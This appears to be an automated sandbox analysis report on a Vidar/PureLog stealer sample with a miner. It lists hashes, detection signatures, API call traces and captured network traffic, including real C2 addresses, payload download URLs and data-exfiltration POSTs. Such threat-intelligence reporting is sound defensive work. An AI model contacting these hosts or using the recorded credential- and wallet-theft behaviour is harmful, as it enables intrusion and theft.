Windows Analysis Report
SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe

Overview

General Information

Sample name: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe
Analysis ID: 1427675
MD5: 98fa9d5bea93312c32be83bf43d6a47b
SHA1: bbb33093f8475548308840af9aaf839f02668deb
SHA256: 14d6115881dcd0df5a9fddef6e72547b797b004261602b1a618d610fc04de40a
Tags: exe

Detection

Phonk Miner, PureLog Stealer, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Phonk Miner
Yara detected PureLog Stealer
Yara detected Vidar
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
High number of junk calls found (likely related to sandbox DOS / API hammering)
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

AV Detection

Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Avira: detected
Source: 00000000.00000002.1632010609.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199673019888"]}
Source: C:\ProgramData\CAFIJKFHIJ.exe ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft123[1].exe ReversingLabs: Detection: 66%
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe ReversingLabs: Detection: 68%
Source: C:\ProgramData\CAFIJKFHIJ.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft123[1].exe Joe Sandbox ML: detected
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Joe Sandbox ML: detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00411720 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 3_2_00411720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00406FD0 CryptUnprotectData,LocalAlloc,LocalFree, 3_2_00406FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00409230 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot,lstrcat,PK11_FreeSlot,lstrcat, 3_2_00409230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00406F50 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 3_2_00406F50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C806C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 3_2_6C806C80

Bitcoin Miner

Source: Yara match File source: 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CAFIJKFHIJ.exe PID: 5744, type: MEMORYSTR
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 23.76.43.59:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 65.109.242.73:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.19.138.79:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2050716572.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.3.dr, freebl3.dll.3.dr
Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source: Binary string: C:\Users\Tommy\Documents\GitHub\Font-Awesome-WPF\src\WPF\FontAwesome.WPF\bin\Signed-Net40\FontAwesome.WPF.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.Linq.2015\Release\System.Data.SQLite.Linq.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source: Binary string: D:\JenkinsWorkspaces\trebuchet-stage-release\AWSDotNetPublic\sdk\src\Services\CloudWatch\obj\AWSSDK.CloudWatch.Net45\Release\net45\AWSSDK.CloudWatch.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source: Binary string: /_/src/Autofac/obj/Release/netstandard2.0/Autofac.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: /_/src/Autofac/obj/Release/netstandard2.0/Autofac.pdbSHA256@ source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.2015\Release\System.Data.SQLite.pdb\ source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.EF6.2015\Release\System.Data.SQLite.EF6.pdbH source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source: Binary string: /home/tmds/repos/Tmds.DBus/src/Tmds.DBus/obj/Release/netstandard2.0/Tmds.DBus.pdbSHA256$ source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.3.dr, vcruntime140[1].dll.3.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.3.dr, msvcp140.dll.3.dr
Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2051879138.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.3.dr, nss3.dll.3.dr
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2046876722.000000001C378000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2043322423.0000000016408000.00000004.00000020.00020000.00000000.sdmp, sqln[1].dll.3.dr
Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2050716572.000000006C86D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.3.dr, mozglue.dll.3.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.3.dr, softokn3.dll.3.dr
Source: Binary string: C:\dev\sqlite\dotnet-private\obj\2015\System.Data.SQLite.EF6.2015\Release\System.Data.SQLite.EF6.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source: Binary string: D:\JenkinsWorkspaces\trebuchet-stage-release\AWSDotNetPublic\sdk\src\Services\CloudWatch\obj\AWSSDK.CloudWatch.Net45\Release\net45\AWSSDK.CloudWatch.pdbSHA256 source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source: Binary string: /home/tmds/repos/Tmds.DBus/src/Tmds.DBus/obj/Release/netstandard2.0/Tmds.DBus.pdb source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F6A7B3 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00F6A7B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040B030 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 3_2_0040B030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004011E0 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose, 3_2_004011E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040D320 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_0040D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004164A0 wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,strtok_s,memset,lstrcat,strtok_s,PathMatchSpecA,wsprintfA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose, 3_2_004164A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00417550 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 3_2_00417550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040A530 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_0040A530
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00416CF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 3_2_00416CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00417140 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 3_2_00417140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040A980 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 3_2_0040A980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004168E0 GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen, 3_2_004168E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199673019888
Source: global traffic HTTP traffic detected: GET /profiles/76561199673019888 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
Source: Joe Sandbox View IP Address: 162.19.138.79 162.19.138.79
Source: Joe Sandbox View IP Address: 23.76.43.59 23.76.43.59
Source: Joe Sandbox View JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKFCFBKFCFBFIDGCGDH User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Content-Length: 278 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBFBKFBGIIIDGDGCFCGI User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHDGCGIDAKEBKECAFIEH User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFIJEHCBAKFCAKFHCGDG User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Content-Length: 7661 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /sqln.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKJKFBKKECFHJKEBKEHI User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Content-Length: 4677 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJDGCBGDBKJKFHIECBA User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBFBKFBGIIIDGDGCFCGI User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /freebl3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mozglue.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /nss3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAFBAKECAEGCBFIEGDGI User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBGCFBGCBFHJECBGDAKK User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /Soft123.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: centrosmissextensions.com Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBKJJEHCBAKFBFHJKFBK User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGC User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKKJEHCGCGDAAAKFHJKJ User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
Source: unknown TCP traffic detected without corresponding DNS query: 65.109.242.73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00404500 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 3_2_00404500
Source: unknown DNS traffic detected: queries for: steamcommunity.com
Source: unknown HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKFCFBKFCFBFIDGCGDH User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 65.109.242.73 Content-Length: 278 Connection: Keep-Alive Cache-Control: no-cache
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.209.162.40/
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://185.209.162.40/apocalypseRussia
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://5.42.65.32/
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://5.42.65.32/CHECK.php
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://5.42.65.32/EOK.php
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://5.42.65.32/SOSORRY.php
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://5.42.65.32/TOKYO.php
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: CAFIJKFHIJ.exe, 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, CAFIJKFHIJ.exe.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: nss3[1].dll.3.dr, softokn3[1].dll.3.dr, softokn3.dll.3.dr, mozglue[1].dll.3.dr, freebl3[1].dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
